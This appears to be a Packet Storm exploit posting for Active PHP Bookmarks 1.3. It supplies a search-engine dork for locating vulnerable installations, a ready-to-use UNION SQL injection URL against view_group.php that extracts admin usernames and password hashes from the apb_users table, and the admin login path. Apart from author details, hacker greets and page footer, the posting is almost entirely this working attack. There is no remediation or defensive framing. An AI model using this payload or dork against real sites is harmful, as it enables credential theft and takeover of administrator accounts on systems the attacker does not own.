Active PHP Bookmarks version 1.3 suffers from the same SQL injection vulnerability as previously discovered in version 1.1.02.
efff500a3f085104f9a9fe116a56584cbb5616054d5a4db29b313deef8d46603=============================================================
~ Author : Mr.Elgaarh
~ Email : scan_cmpu@yahoo.com
~ Home : http://securityreason.com/
=============================================================
Dork : "Powered by Active PHP Bookmarks v1.3" inurl:.view_group.php?id=
./Exploit:
first search for the admin username :
ex : http://server/path/view_group.php?id=-4
ex : http://[Target.com]/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--
admin panel path : http://server/path/cookie_auth.php?action=cookie_login
---------------------------------------------------------------------------------------------------------------------------
Greets : Mado - Dr.Hacker - Mr.Max - broken proxy - Offensive Security - AG-Spider - ISlamic Defenders Crew - <http://www.offensive-security.com>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed